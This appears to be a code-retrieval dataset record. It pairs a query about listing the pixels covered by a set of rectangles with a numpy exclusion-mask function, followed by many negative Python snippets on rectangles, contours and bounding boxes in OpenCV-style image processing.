[ "0.594339", "0.5888286", "0.5828619", "0.5812646", "0.5808996", "0.5784285", "0.57349354", "0.57313955", "0.5709643", "0.56814396", "0.566322", "0.56176597", "0.55183667", "0.5507987", "0.54847234", "0.54687953", "0.5410043", "0.53843975", "0.53818494", "0.53818494", "0.5374305", "0.5341885", "0.5327227", "0.5293554", "0.52656937", "0.52650297", "0.524048", "0.5235731", "0.52053887", "0.52048236", "0.51777524", "0.5167627", "0.5152071", "0.5152036", "0.51512814", "0.51467514", "0.51382947", "0.51291865", "0.51264656", "0.5122172", "0.51160264", "0.51095885", "0.51071936", "0.5099961", "0.5099415", "0.50989735", "0.50974023", "0.50956863", "0.5091406", "0.50776935", "0.50742424", "0.50639945", "0.50623554", "0.5056605", "0.5044332", "0.5041221", "0.5030338", "0.50275487", "0.5017519", "0.501203", "0.5008173", "0.5004803", "0.50044465", "0.49922353", "0.49914896", "0.49878332", "0.49798918", "0.4977223", "0.49764562", "0.49753666", "0.49735236", "0.49654618", "0.49645266", "0.49645084", "0.49605277", "0.49579573", "0.49534982", "0.49529946", "0.49525762", "0.49383825", "0.49360278", "0.4934216", "0.4930809", "0.49305487", "0.4928669", "0.4922795", "0.4915297", "0.49007353", "0.48996425", "0.48964304", "0.48959434", "0.4895194", "0.48916197", "0.48885614", "0.4887207", "0.48845443", "0.48822647", "0.48804474", "0.48752373", "0.487512" ]
0.7071252
0
From the list of rectangles, build a list of pixels that these rectangles cover
def _build_list_of_excluded_pixels2(self, exclude_zones, img_width, img_height): full_image = numpy.ones((img_height, img_width), dtype=uint8) for x, y, width, height in exclude_zones: # creates a matrix where 0 is placed on pixels to exclude, and 1 on pixel to keep exclusion = numpy.zeros((height, width), dtype=uint8) exclusion = numpy.pad(exclusion, ((min(y, img_height) , max(0, img_height - (y + height))), (min(x, img_width), max(0, img_width - (x + width)))), constant_values=1) full_image *= exclusion[0:img_height, 0:img_width] # crop exclusion array if it's size is higher than image (exclusion zone outside of image dimensions) return full_image
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def rect(rows: int, cols: int, top: int = 0,\n left: int = 0) -> List['GridQubit']:\n return [\n GridQubit(row, col)\n for row in range(top, top + rows)\n for col in range(left, left + cols)\n ]", "def find_rects(image: np.ndarray) -> List[np.ndarray]:\n\n gray = cv.cvtColor(image.copy(), cv.COLOR_RGB2GRAY)\n gray = cv.GaussianBlur(gray, (5, 5), 0)\n #edged = cv.Canny(gray, 70, 180) # this numbers is hand picked guess from a few photos\n edged = auto_canny(gray)\n\n contours = cv.findContours(edged.copy(), cv.RETR_LIST, cv.CHAIN_APPROX_SIMPLE)\n contours = contours[0] if len(contours) == 2 else contours[1]\n contours.sort(key=cv.contourArea, reverse=True)\n contours = [cnt for cnt in contours if cv.contourArea(cnt) > 15] # 15px contour area, basically cnt>=4x4\n\n rects = list(map(cv.minAreaRect, contours))\n boxes = list(map(lambda r: Rect.from_cvrect(*r[0], *r[1]), rects))\n\n boxes = Rect.nms_merge(boxes)\n\n return boxes or list()", "def extract_valid_rects(rects, img, others_landmark_pts):\n # Extraction\n dst = list()\n for rect in rects:\n # Check if others landmarks are contained\n for others_pt in others_landmark_pts:\n if rect_contain(rect, others_pt):\n break\n else:\n dst.append(rect)\n\n # avoid no rectangle\n if len(dst) == 0:\n dst.append((0, 0, img.shape[1], img.shape[0]))\n\n return dst", "def normalizeRects(rects):\n\tsmallestX = min(rect[0] for rect in rects)\n\tsmallestY = min(rect[1] for rect in rects)\n\treturn list(\n\t\t(-smallestX + left,\n\t\t -smallestY + top,\n\t\t -smallestX + right,\n\t\t -smallestY + bottom) for left, top, right, bottom in rects\n\t)", "def find_overlap_rect_list(rect_list):\n\n\n overlap_list = []\n\n for index, item in enumerate(rect_list):\n index += 1\n\n while index < len(rect_list):\n #check item with next rectangle in the list\n x_overlap = find_overlap_range(item['left_x'], item['width'], \n rect_list[index]['left_x'],\n rect_list[index]['width'])\n \n y_overlap = find_overlap_range(item['bottom_y'], item['height'], \n rect_list[index]['bottom_y'],\n rect_list[index]['height'])\n\n if x_overlap and y_overlap:\n overlap_list.append({'left_x':x_overlap[0], \n 'bottom_y': y_overlap[0],\n 'width': x_overlap[1],\n 'height': y_overlap[1]})\n\n index += 1\n\n return overlap_list", "def getBigRectangles(recognisedFacesCenters, recognisedFacesPercentages, recognisedFacesCenterSizes):\n recognisedBigFacesCenters = []\n recognisedBigFacesCentersSizes = []\n recognisedBigFacesPercentages = []\n\n \"\"\"Putting the higest probability frame in the final array by default\"\"\"\n maxvalueCenters = max(recognisedFacesPercentages)\n maxposCenters = recognisedFacesPercentages.index(maxvalueCenters)\n\n recognisedBigFacesCenters.append(recognisedFacesCenters[maxposCenters])\n recognisedBigFacesCentersSizes.append(\n recognisedFacesCenterSizes[maxposCenters])\n recognisedBigFacesPercentages.append(\n recognisedFacesPercentages[maxposCenters])\n\n \"\"\"Purging initial arrays of the values we just put in the final arrays\"\"\"\n recognisedFacesCenters.pop(maxposCenters)\n recognisedFacesPercentages.pop(maxposCenters)\n recognisedFacesCenterSizes.pop(maxposCenters)\n\n for i in range(len(recognisedFacesCenters)):\n maxvalueCenters = max(recognisedFacesPercentages)\n maxposCenters = recognisedFacesPercentages.index(maxvalueCenters)\n test = getTowCornersOfRectangle(\n recognisedFacesCenters[maxposCenters], recognisedFacesCenterSizes[maxposCenters], recognisedBigFacesCenters, recognisedBigFacesCentersSizes)\n \"\"\"If the area are not overlapping then add 
the tested frame into the final arrays\"\"\"\n if(test == 1):\n recognisedBigFacesCenters.append(\n recognisedFacesCenters[maxposCenters])\n recognisedBigFacesCentersSizes.append(\n recognisedFacesCenterSizes[maxposCenters])\n recognisedBigFacesPercentages.append(\n recognisedFacesPercentages[maxposCenters])\n \"\"\"Purging initial arrays of the tested values\"\"\"\n recognisedFacesCenters.pop(maxposCenters)\n recognisedFacesPercentages.pop(maxposCenters)\n recognisedFacesCenterSizes.pop(maxposCenters)\n return [recognisedBigFacesCenters, recognisedBigFacesCentersSizes, recognisedBigFacesPercentages]", "def get_rectangles_from_mask(img_arr):\n masks_point_dict = _get_mask_points(img_arr)\n mar_list = list()\n for object_id in masks_point_dict.keys():\n mask_points = masks_point_dict[object_id]\n mask_points = tuple(mask_points)\n hull_ordered = [mask_points[index] for index in ConvexHull(mask_points).vertices]\n hull_ordered.append(hull_ordered[0]) # making it cyclic, now first and last point are same\n\n # not a rectangle\n if len(hull_ordered) < 5:\n continue\n\n hull_ordered = tuple(hull_ordered)\n min_rectangle = _bounding_area(0, hull_ordered)\n for i in range(1, len(hull_ordered) - 1):\n rectangle = _bounding_area(i, hull_ordered)\n if rectangle['area'] < min_rectangle['area']:\n min_rectangle = rectangle\n\n min_rectangle['unit_vector_angle'] = atan2(min_rectangle['unit_vector'][1],\n min_rectangle['unit_vector'][0])\n\n min_rectangle['rectangle_center'] = _to_xy_coordinates(min_rectangle['unit_vector_angle'],\n min_rectangle['rectangle_center'])\n rect_corners = _rectangle_corners(min_rectangle)\n\n rect_corners = tuple(rect_corners)\n points_ordered = [rect_corners[index] for index in ConvexHull(rect_corners).vertices]\n mar_list.append(points_ordered)\n return mar_list", "def get_panels(rectangles):\n\n pairs = []\n for rect in rectangles:\n if (2 * rect[1][0] < rect[1][1]) or (rect[1][0] > 2 * rect[1][1]):\n if 2 * rect[1][0] < rect[1][1]:\n long_dim1 = 0\n elif rect[1][0] > 2 * rect[1][1]:\n long_dim1 = 1\n\n box = cv2.boxPoints(rect)\n box2 = []\n min_angle = 10;\n for rect2 in rectangles:\n if 2 * rect[1][0] < rect[1][1]:\n long_dim2 = 0\n elif rect[1][0] > 2 * rect[1][1]:\n long_dim2 = 1\n if (rect2 != rect) and (abs(rect[2] - rect2[2]) < min_angle) and (long_dim1 == 1 and long_dim2 == 1):\n box2 = cv2.boxPoints(rect2)\n min_angle = abs(rect[2] - rect2[2])\n\n if len(box2) != 0:\n box_pair = (box, box2)\n pairs.append(box_pair)\n\n return pairs", "def draw_rects(img, rects, color):\n for x1, y1, x2, y2 in rects:\n cv2.rectangle(img, (x1, y1), (x2, y2), color, 2)", "def rectpolyctl(xmin,xmax,ymin,ymax):\n pc=[]\n pc.append((xmin,ymin))\n pc.append((xmin,ymax))\n pc.append((xmax,ymax))\n pc.append((xmax,ymin))\n pc.append((xmin,ymin))\n return pc", "def crop_to_regions(img: np.ndarray, check_areas: List[Dict[str, List[int]]]) -> List[np.ndarray]:\n ret = []\n for region in check_areas:\n from_x = region['start'][0]\n from_y = region['start'][1]\n to_x = from_x + region['size'][0]\n to_y = from_y + region['size'][1]\n # Don't overflow\n to_x = to_x if to_x < img.shape[1] else img.shape[1] - 1\n to_y = to_y if to_y < img.shape[0] else img.shape[0] - 1\n ret.append(img[from_y:to_y, from_x:to_x])\n return ret", "def overlap_list_rect(list_rects):\n overlap = {}\n x_points = []\n y_points = []\n\n for rect in list_rects:\n x_points.append([rect['left_x'], rect['width']])\n y_points.append([rect['bottom_y'], rect['height']])\n\n x_overlap = find_overlap_range_list(x_points)\n\n 
y_overlap = find_overlap_range_list(y_points)\n\n if x_overlap and y_overlap:\n overlap['left_x'] = x_overlap[0]\n overlap['bottom_y'] = y_overlap[0]\n overlap['width'] = x_overlap[1]\n overlap['height'] = y_overlap[1]\n \n return overlap", "def get_rectangles_mask(self, thresh: np.ndarray) -> np.ndarray:\r\n contours = cv.findContours(thresh, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)[0]\r\n mask = np.zeros(thresh.shape, np.uint8)\r\n good_contours = sorted(\r\n [cnt for cnt in contours if 100000 < cv.contourArea(cnt) < 200000],\r\n key=cv.contourArea,\r\n )\r\n\r\n setattr(self, \"contour1\", good_contours[0])\r\n setattr(\r\n self,\r\n \"contour2\",\r\n good_contours[1]\r\n if cv.pointPolygonTest(\r\n good_contours[1], tuple(good_contours[0][0][0]), False\r\n )\r\n < 0\r\n else good_contours[2],\r\n )\r\n\r\n cv.drawContours(mask, [self.contour1], 0, 255, -1)\r\n cv.drawContours(mask, [self.contour2], 0, 255, -1)\r\n\r\n return mask", "def __init_rect_list(self, ind, min_prob = 0.5):\n #bbox_label_pred = self.net.tops['bbox_label'].data[ind]\n #binary_pred = self.net.tops['binary_label'].data[ind]\n bottom_height = self.image_height\n bottom_width = self.image_width\n bbox_label_pred = self.net.tops['bbox_pred'].data[ind]\n binary_pred = self.net.tops['binary_softmax'].data[ind]\n label_pred = self.net.tops['label_softmax'].data[ind]\n \n (_, top_height, top_width) = bbox_label_pred.shape\n y_mul = bottom_height * 1. / top_height\n x_mul = bottom_width * 1. / top_width\n rect_list = []\n for y in xrange(top_height):\n for x in xrange(top_width):\n # corresponds to indices in original image\n cx_orig = x_mul * (x + 0.5)\n cy_orig = y_mul * (y + 0.5)\n\n # we predict a symbol here if p(no label) < x\n if binary_pred[0, y, x] < 0.5:\n k = np.argmax(label_pred[:, y, x]) \n #if label_pred[k, y, x] < 0.2: continue\n\n # apply offsets to get positions in original image\n cx = cx_orig + bbox_label_pred[0, y, x]\n cy = cy_orig + bbox_label_pred[1, y, x]\n w = bbox_label_pred[2, y, x]\n h = bbox_label_pred[3, y, x]\n xmin = cx - w / 2.0\n ymin = cy - h / 2.0\n rect = Rect(xmin, ymin, xmin + w, ymin + h, label=k, prob=label_pred[k, y, x])\n rect_list.append(rect)\n\n return rect_list", "def CV_rectangles(self,XYSP):\n X,Y,S,P = XYSP\n rectangles=[]\n for i in range(3):\n for j in range(3):\n rectangles.append([(X+i*S+i*P,Y+j*S+j*P),\\\n (X+i*S+i*P+S,Y+j*S+j*P+S)])\n return rectangles", "def recursive_rectangles((x, y), (x0, y0)=(0, 0)):\n x, dx = max(x, x0), min(x, x0)\n y, dy = max(y, y0), min(y, y0)\n if (dx, dy) == (0, 0):\n return _recursive_rectangles(x, y)\n rects = _recursive_rectangles(x - dx, y - dy)\n # return set(map(lambda x: tuple(map(tuple, np.array(x) + (dx, dy))), rects))\n return set(((x1 + dx, y1 + dy), (x2 + dx, y2 + dy)) for ((x1, y1), (x2, y2)) in rects)", "def cover_rect_with_circles(w, h, r):\n\n # initialize result list\n res = []\n\n # horizontal distance between circle centers\n x_dist = math.sqrt(3) * r\n # vertical distance between circle centers\n y_dist = 1.5 * r\n # number of circles per row (different for even/odd rows)\n cnt_x_even = math.ceil(w / x_dist)\n cnt_x_odd = math.ceil((w - x_dist / 2) / x_dist) + 1\n # number of rows\n cnt_y = math.ceil((h - r) / y_dist) + 1\n\n y_offs = 0.5 * r\n for y in range(cnt_y):\n if y % 2 == 0:\n # shift even rows to the right\n x_offs = x_dist / 2\n cnt_x = cnt_x_even\n else:\n x_offs = 0\n cnt_x = cnt_x_odd\n\n for x in range(cnt_x):\n res.append((x_offs + x * x_dist, y_offs + y * y_dist))\n\n # top-right circle is not always 
required\n if res and not rect_circle_collision(0, w, 0, h, res[-1][0], res[-1][1], r):\n res = res[0:-1]\n\n return res", "def _build_list_of_excluded_pixels(self, exclude_zones):\n \n pixels = []\n for x, y, width, height in exclude_zones:\n for row in range(height):\n for col in range(width):\n pixels.append(Pixel(col + x, row + y))\n \n return pixels", "def draw_rects(in_img, rects, colour=(255, 0, 0)):\n img = convert_when_colour(colour, in_img.copy())\n thickness = int(max(img.shape) / 150)\n for rect in rects:\n img = cv2.rectangle(\n img,\n tuple(int(x) for x in rect[0]),\n tuple(int(x) for x in rect[1]),\n colour,\n thickness,\n )\n return img", "def find_rects_white(image: np.ndarray) -> List[np.ndarray]:\n\n raise NotImplementedError()\n\n #gray = norm_color_test(image.copy())\n gray = cv.cvtColor(image.copy(), cv.COLOR_RGB2GRAY)\n gray = cv.GaussianBlur(gray, (5, 5), 0)\n #edged = cv.Canny(gray, 70, 180) # this numbers is hand picked guess from a few photos\n edged = auto_canny(gray) # this numbers is hand picked guess from a few photos\n\n # split to HSV, then pick up rouhly any white color zeroing out the rest\n hsv = cv.cvtColor(image.copy(), cv.COLOR_RGB2HSV)\n h,s,v = cv.split(hsv)\n h[h<145] = 0\n h[h>165] = 0\n #h = cv.GaussianBlur(h, (5, 5), 0)\n normed = cv.normalize(h, None, 0, 255, cv.NORM_MINMAX, cv.CV_8UC1)\n kernel = cv.getStructuringElement(shape=cv.MORPH_ELLIPSE, ksize=(5,5))\n opened = cv.morphologyEx(normed, cv.MORPH_OPEN, kernel)\n\n # now find white regions contours\n whites = cv.findContours(opened, cv.RETR_LIST, cv.CHAIN_APPROX_SIMPLE)[0]\n whites.sort(key=cv.contourArea, reverse=True)\n whites = [cnt for cnt in whites if cv.contourArea(cnt) > 15] # 15px contour area, basically cnt>=4x4\n\n whiterects = []\n for i in whites:\n rect = cv.minAreaRect(i)\n w,h = rect[1]\n if w*h > 150: # 150px area, or rougly 12x12 pixels\n whiterects.append(rect)\n\n #cv.drawContours(image, whites, -1, COLORS[2 % len(COLORS)], 2)\n #cv.imshow('test', image)\n #cv.waitKey()\n\n whites = list(map(lambda r: Rect.from_cvrect(*r[0], *r[1]), whiterects))\n\n\n\n #cv.imshow('test', edged)\n #cv.waitKey()\n\n contours = cv.findContours(edged.copy(), cv.RETR_LIST, cv.CHAIN_APPROX_SIMPLE)\n contours = contours[0] if len(contours) == 2 else contours[1]\n contours.sort(key=cv.contourArea, reverse=True)\n contours = [cnt for cnt in contours if cv.contourArea(cnt) > 15] # 15px contour area, basically cnt>=4x4\n\n rects = list(map(cv.minAreaRect, contours))\n boxes = list(map(lambda r: Rect.from_cvrect(*r[0], *r[1]), rects))\n\n # filter non overlapping contours\n for i in reversed(range(len(boxes))):\n overlaps = False\n for wbox in whites:\n if wbox.overlaps(boxes[i]):\n overlaps = True\n break\n if not overlaps:\n boxes.pop(i)\n\n boxes = Rect.nms_merge(boxes)\n\n for i in range(len(contours)):\n #peri = cv.arcLength(contours[i], True)\n #approx = cv.approxPolyDP(contours[i], 0.02 * peri, True)\n rect = cv.minAreaRect(contours[i])\n box = cv.boxPoints(rect)\n box = np.int0(box)\n #cv.drawContours(image, [box], -1, COLORS[i % len(COLORS)], 2)\n #cv.putText(image, f'{i}: {cv.contourArea(contours[i])}px', (int(rect[0][0]), int(rect[0][1])), cv.FONT_HERSHEY_SIMPLEX, 0.6, COLORS[i % len(COLORS)], 1)\n\n #cv.drawContours(image, contours, -1, COLORS[1], 2)\n\n for b in boxes:\n cv.line(image, (int(b.xmin), int(b.ymin)), (int(b.xmax), int(b.ymin)), (0, 255, 255), 2)\n cv.line(image, (int(b.xmin), int(b.ymax)), (int(b.xmax), int(b.ymax)), (0, 255, 255), 2)\n cv.line(image, (int(b.xmin), 
int(b.ymin)), (int(b.xmin), int(b.ymax)), (0, 255, 255), 2)\n cv.line(image, (int(b.xmax), int(b.ymin)), (int(b.xmax), int(b.ymax)), (0, 255, 255), 2)\n\n stacked = np.hstack( (cv.cvtColor(edged, cv.COLOR_GRAY2RGB), cv.cvtColor(opened, cv.COLOR_GRAY2RGB), image))\n cv.namedWindow('test', 0)\n cv.imshow('test', stacked)\n cv.waitKey()\n\n cv.imwrite('dump.jpg', stacked)\n\n\n return boxes or list()", "def _cells_for_rect(self, r):\n cells = set()\n cy = floor(r.y1 / self.cell_size)\n while (cy * self.cell_size) <= r.y2:\n cx = floor(r.x1 / self.cell_size)\n while (cx * self.cell_size) <= r.x2:\n cells.add((int(cx), int(cy)))\n cx += 1.0\n cy += 1.0\n return cells", "def draw_rects_on_img(img, rects):\n img_copy = img.copy()\n for rect in rects:\n x, y, w, h = rect\n cv2.rectangle(img_copy, (x,y), (x+w,y+h), (0,255,0), 2)\n return img_copy", "def list_square_inches(claim):\n return [(x, y)\n for x in range(claim['left'], claim['right'])\n for y in range(claim['top'], claim['bottom'])]", "def draw_rects(self, L, col):\n for (i, j) in L:\n self.draw_rect(i, j, col)", "def under_rect(self, rect):\n x_min = self.clampx((rect.left - self._origin.x) // self._cell_size[0])\n x_max = self.clampx((rect.right - self._origin.x) // self._cell_size[0])\n y_min = self.clampy((rect.top - self._origin.y) // self._cell_size[1])\n y_max = self.clampy((rect.bottom - self._origin.y) // self._cell_size[1])\n cells = []\n for ix in range(x_min, x_max + 1):\n for iy in range(y_min, y_max + 1):\n index = iy * self._cell_count[0] + ix\n cells.append(self._cells[index])\n return cells", "def get_random_rectangles(self):\n while len(self.rectangles) < self.n_rectangles:\n upper_left = [np.random.randint(0, 28) for i in range(2)] # upper-left corner coordinate\n lower_right = [np.random.randint(0, 28) for i in range(2)] # lower-right corner coordinate\n # Have upper left corner less than lower right corner of the rectangle\n if upper_left[0] < lower_right[0] and upper_left[1] < lower_right[1]:\n currentRect = Rectangle(upper_left, lower_right)\n currentArea = currentRect.area()\n # Only keep the rectangles whose area is 130 to 170\n if 130 <= currentArea <= 170:\n self.rectangles.append(currentRect)\n #print(\"Upper Left \", upper_left, \" Lower right \", lower_right, \" Area: \", currentRect.area())", "def _rectangles(m, n):\n return m * (m+1) * n * (n+1) // 4", "def get_rectangles(mask, threshold_area):\n contours, hierarchy = cv2.findContours(mask,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n\n rectangles = []\n for contour in contours:\n if cv2.contourArea(contour) > threshold_area:\n rect = cv2.boundingRect(contour)\n rectangles.append(rect)\n return rectangles", "def get_rectangles(mask, threshold_area):\n contours, hierarchy = cv2.findContours(mask,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n\n rectangles = []\n for contour in contours:\n if cv2.contourArea(contour) > threshold_area:\n rect = cv2.boundingRect(contour)\n rectangles.append(rect)\n return rectangles", "def cell_regions(\n x_len: float, y_len: float, factor: float = 2 / 3, buffer: float = 3.5\n) -> Tuple[List[List[float]], ...]:\n x_min, x_max = x_len / 2, -x_len / 2\n y_min, y_max = y_len / 2, -y_len / 2\n\n cell = [[x_min, x_max, x_max, x_min], [y_min, y_min, y_max, y_max]]\n\n liq = [\n [\n x_min * factor + buffer,\n x_max * factor - buffer,\n x_max * factor - buffer,\n x_min * factor + buffer,\n ],\n [\n y_min * factor + buffer,\n y_min * factor + buffer,\n y_max * factor - buffer,\n y_max * factor - buffer,\n ],\n ]\n\n crys = [\n [\n x_min * 
factor - buffer,\n x_max * factor + buffer,\n x_max * factor + buffer,\n x_min * factor - buffer,\n ],\n [\n y_min * factor - buffer,\n y_min * factor - buffer,\n y_max * factor + buffer,\n y_max * factor + buffer,\n ],\n ]\n\n return cell, liq, crys", "def get_boxes():\n boxes = []\n\n box_sizes = [256]\n left_x_cords = [x for x in range(0,1280,12)]\n top_y_cords = [y for y in range(360,720,12)]\n\n for box_size in box_sizes:\n for x_cord in left_x_cords:\n for y_cord in top_y_cords:\n if box_size+x_cord < 1280 and box_size+y_cord < 720:\n boxes.append([x_cord, y_cord, x_cord+box_size, y_cord+box_size])\n\n return boxes", "def build_list_of_champion_cards_rectangles(\n CARDS_TO_BUY_AMOUNT_=CARDS_TO_BUY_AMOUNT,\n Y_FIRST_CHAMPION_CARD_=Y_FIRST_CHAMPION_CARD,\n W_CHAMPION_CARD_=W_CHAMPION_CARD,\n H_CHAMPION_CARD_=H_CHAMPION_CARD,\n):\n logging.debug(\"Function build_list_of_champion_cards_rectangles() called\")\n\n cards_rectangles = [0] * CARDS_TO_BUY_AMOUNT_\n for i in range(0, CARDS_TO_BUY_AMOUNT_):\n top_left = (calculate_card_position_on_screen(i), Y_FIRST_CHAMPION_CARD_)\n bottom_right = (\n calculate_card_position_on_screen(i) + W_CHAMPION_CARD_,\n Y_FIRST_CHAMPION_CARD_ + H_CHAMPION_CARD_,\n )\n center = (\n top_left[0] + W_CHAMPION_CARD_ // 2,\n top_left[1] + H_CHAMPION_CARD_ // 2,\n )\n # print(\"Type\" ,type(center))\n cards_rectangles[i] = [top_left, bottom_right, center]\n\n logging.debug(\"Function build_list_of_champion_cards_rectangles() end\")\n return cards_rectangles", "def _find_corners(self) -> list:\n width, height = self.width, self.height\n return [(0, 0), (width, 0), (0, height), (width, height)]", "def rectangleindices(self):\n return {r.n for r in self.rectangles}", "def boundingRectPoints(cnt):\n\tx, y, w, h = cv2.boundingRect(cnt)\n\tfirst = (x, y)\n\tend = (x+w, y+h)\n\treturn {\"top-left\": first, \"bottom-right\":end}", "def to_area(x, y, w, h, bottom_only=False):\n cover = []\n if bottom_only:\n for i in range(int(ceil(w))):\n cover.append((int(x)+i, int(y+ceil(h)-1)))\n else:\n for i in range(int(ceil(w))):\n for j in range(int(ceil(h))):\n cover.append((int(x)+i, int(y)+j))\n\n return cover", "def find_rect(self, data_3d):\n datax = [i[0] for i in data_3d]\n datay = [i[1] for i in data_3d]\n\n return min(datax), max(datax), min(datay), max(datay)", "def rectangles_in_grid(x_f, y_f):\n count = 0\n for x in range(x_f):\n for y in range(y_f):\n for i in range(x, x_f):\n for j in range(y, y_f):\n count += 1\n return count", "def get_pair_rects(contours):\n\n rect_pairs = []\n for index, cnt in enumerate(contours):\n # Rotated rect - ( center (x,y), (width, height), angle of rotation )\n rect = cv2.minAreaRect(cnt)\n center_x, center_y = rect[0]\n rect_angle = -round(rect[2], 2)\n\n if rect_angle > 45.0:\n # Iterate through all of the potential matches\n min_x_dist = min_rect = min_index = None\n for pot_index, pot_match in enumerate(contours):\n if np.array_equal(pot_match, cnt):\n continue\n\n match_rect = cv2.minAreaRect(pot_match)\n\n # Check if match is to the right of the contour\n if match_rect[0][0] > rect[0][0] and abs(\n match_rect[2] - rect_angle) > ANGLE_TOLERANCE_DEG:\n x_distance = match_rect[0][0] - rect[0][0]\n\n if min_x_dist is None or x_distance < min_x_dist:\n min_x_dist = x_distance\n min_rect = match_rect\n min_index = pot_index\n\n if min_rect is not None:\n rect_pairs.append((rect, min_rect))\n np.delete(contours, index)\n np.delete(contours, min_index)\n\n return rect_pairs", "def get_surroundings(matrix, coord):\n width = 
np.shape(matrix)[0]\n height = np.shape(matrix)[1]\n coordinates = []\n\n # top\n (\n coordinates.append((coord[0], coord[1] - 1))\n if coord[1] - 1 >= 0\n else None\n )\n # bottom\n (\n coordinates.append((coord[0], coord[1] + 1))\n if coord[1] + 1 < height\n else None\n )\n # left\n (\n coordinates.append((coord[0] - 1, coord[1]))\n if coord[0] - 1 >= 0\n else None\n )\n # right\n (\n coordinates.append((coord[0] + 1, coord[1]))\n if coord[0] + 1 < width\n else None\n )\n\n return coordinates", "def _recursive_encoded_rectangles(x, y):\n if x < 1 or y < 1:\n raise ValueError(\"Invalid input\")\n if x == 1 and y == 1:\n return {encode_rectangle_to_int(((1, 1), (0, 0))), } # Must return a set\n if x == 1:\n return _recursive_encoded_rectangles(x, y-1) | set(encode_rectangle_to_int(((0, j), (x, y))) for j in range(y))\n if y == 1:\n return _recursive_encoded_rectangles(x-1, y) | set(encode_rectangle_to_int(((i, 0), (x, y))) for i in range(x))\n return _recursive_encoded_rectangles(x-1, y) | _recursive_encoded_rectangles(x, y-1) | \\\n set(encode_rectangle_to_int(((i, j), (x, y))) for i in range(x) for j in range(y))", "def recursive_encoded_rectangles((x, y), (x0, y0)=(0, 0)):\n x, dx = max(x, x0), min(x, x0)\n y, dy = max(y, y0), min(y, y0)\n if (dx, dy) == (0, 0):\n return _recursive_encoded_rectangles(x, y)\n rects = _recursive_encoded_rectangles(x - dx, y - dy)\n func = partial(translate_encoded_rectangle, vector=(dx, dy))\n return set(map(func, rects))", "def get_background_pixels(img, rect):\n mask = np.zeros(img.shape[:2], np.uint8)\n bg_model = np.zeros((1,65), np.float64)\n fg_model = np.zeros((1,65), np.float64)\n cv2.grabCut(img, mask, rect, bg_model, fg_model, 5, cv2.GC_INIT_WITH_RECT)\n flattened = mask.flatten()\n background_coords = np.where((flattened == 0) | (flattened == 2))\n return background_coords", "def images_at(self, rects, colorkey = None):\n return [self.image_at(rect, colorkey) for rect in rects]", "def _get_tiles(self, width: Numeric) -> List[Polygon]:\n min_x, min_y, max_x, max_y = self._get_rounded_bounding_box(self.geom, width)\n tiles = []\n\n for i in range(0, int((max_x - min_x) / width)):\n for j in range(0, int((max_y - min_y) / width)):\n tile = box(\n (i * width) + min_x,\n (j * width) + min_y,\n ((i + 1) * width) + min_x,\n ((j + 1) * width) + min_y,\n )\n\n if self.geom.intersects(tile):\n tiles.append(tile)\n\n return tiles", "def rasterize(con, cellSize=50, xMin=None, yMin=None, xMax=None, yMax=None):\n\n if xMin is None or yMin is None or xMax is None or yMax is None:\n _xMin, _yMin, _xMax, _yMax = con.bounds\n if xMin is None:\n xMin = _xMin\n if yMin is None:\n yMin = _yMin\n if xMax is None:\n xMax = _xMax\n if yMax is None:\n yMax = _yMax\n\n hitXMax = False\n hitYMin = False\n xSlice = 0\n ySlice = 0\n halfCellSize = cellSize / 2.0\n bitmap = []\n\n while not hitYMin:\n bitmap.append([])\n yScan = -(ySlice * cellSize + halfCellSize) + yMax\n if yScan < yMin:\n hitYMin = True\n while not hitXMax:\n xScan = (xSlice * cellSize + halfCellSize) + xMin\n if xScan > xMax:\n hitXMax = True\n test = con.pointInside((xScan, yScan))\n if test:\n bitmap[-1].append(True)\n else:\n bitmap[-1].append(False)\n xSlice = xSlice + 1\n hitXMax = False\n xSlice = 0\n ySlice = ySlice + 1\n\n return bitmap", "def collision_test(rect, tiles):\r\n hit_list = []\r\n for tile in tiles:\r\n if rect.colliderect(tile):\r\n hit_list.append(tile)\r\n return hit_list", "def rectangles_in_cross_hatch(x_f, y_f):\n x0, y0 = 0, 0\n Q = np.matrix(((1, -1), (1, 1))) # 
Transformation matrix to cross-hatch coordinates (counter-clockwise)\n I = Q.I # Inverse transformation matrix back to grid coordinates\n y_prime_max = ((x0, y_f)*Q)[(0,1)] # Top-left of rectangle defines maximum y-value for cross-hatch coordinates\n y_prime_min = ((x_f, y0)*Q)[(0,1)] # Bottom-right defines minimum y-value\n x_prime_max = ((x_f, y_f)*Q)[(0,0)] # Top-right defines maximum x-value\n x_prime_min = 0 # Bottom-left corner remains at the origin\n x_prime_min += 1; y_prime_min += 1 # Add 1 because outer row of cross-hatch has no rectangles within the grid\n\n count = 0\n for x_prime in range(x_prime_min, x_prime_max):\n for y_prime in range(y_prime_min, y_prime_max):\n point = (x_prime, y_prime)*I\n x, y = point.A1 # .A1 flattens to allow easy assignment\n if x >= x0 and y >= y0: # Bottom corner is within bounds of grid\n for i in range(x_prime+1, x_prime_max):\n if ((i, y_prime)*I).A1[0] > x_f: break # Right corner out of grid; done with this x', y'\n for j in range(y_prime+1, y_prime_max):\n if ((x_prime, j)*I).A1[0] < x0: break # Left corner out of grid\n if ((i, j)*I).A1[1] > y_f: break # Top corner out of grid\n count += 1 # All 4 corners within bounds of grid\n return count", "def rect_union(class_list):\n if len(class_list) >= 1:\n rect_list = []\n for class_object in class_list:\n rect_list.append(class_object.rect)\n return rect_list[0].unionall(rect_list[1:])\n else:\n return Rect(0,0,0,0)", "def recognize_pieces(edges, v, squares):\n\n pieces = []\n\n v = cv2.equalizeHist(v)\n for p1, p2 in squares:\n # count the number of slightly centered edges\n occupancy = sum(edges[y][x]\n for x in range(p1.x + 5, p2.x - 5)\n for y in range(p1.y + 5, p2.y - 5))\n\n if occupancy > 70*255:\n corners = (v[p1.y][p1.x], v[p1.y][p2.x],\n v[p2.y][p1.x], v[p2.y][p2.x])\n\n # average v-component of the corners\n avg = sum(map(float, corners)) / len(corners)\n\n # black pixels should be relatively black\n # when compared to the corner average\n black = sum(v[y][x] / avg < 0.2\n for x in range(p1.x, p2.x + 1)\n for y in range(p1.y, p2.y + 1))\n\n if black >= 1000 and black != 1049:\n color = \"B\"\n else:\n color = \"W\"\n\n pieces.append(color)\n else:\n pieces.append(None)\n\n return pieces", "def get_foreground_pixels(img, rect):\n mask = np.zeros(img.shape[:2], np.uint8)\n bg_model = 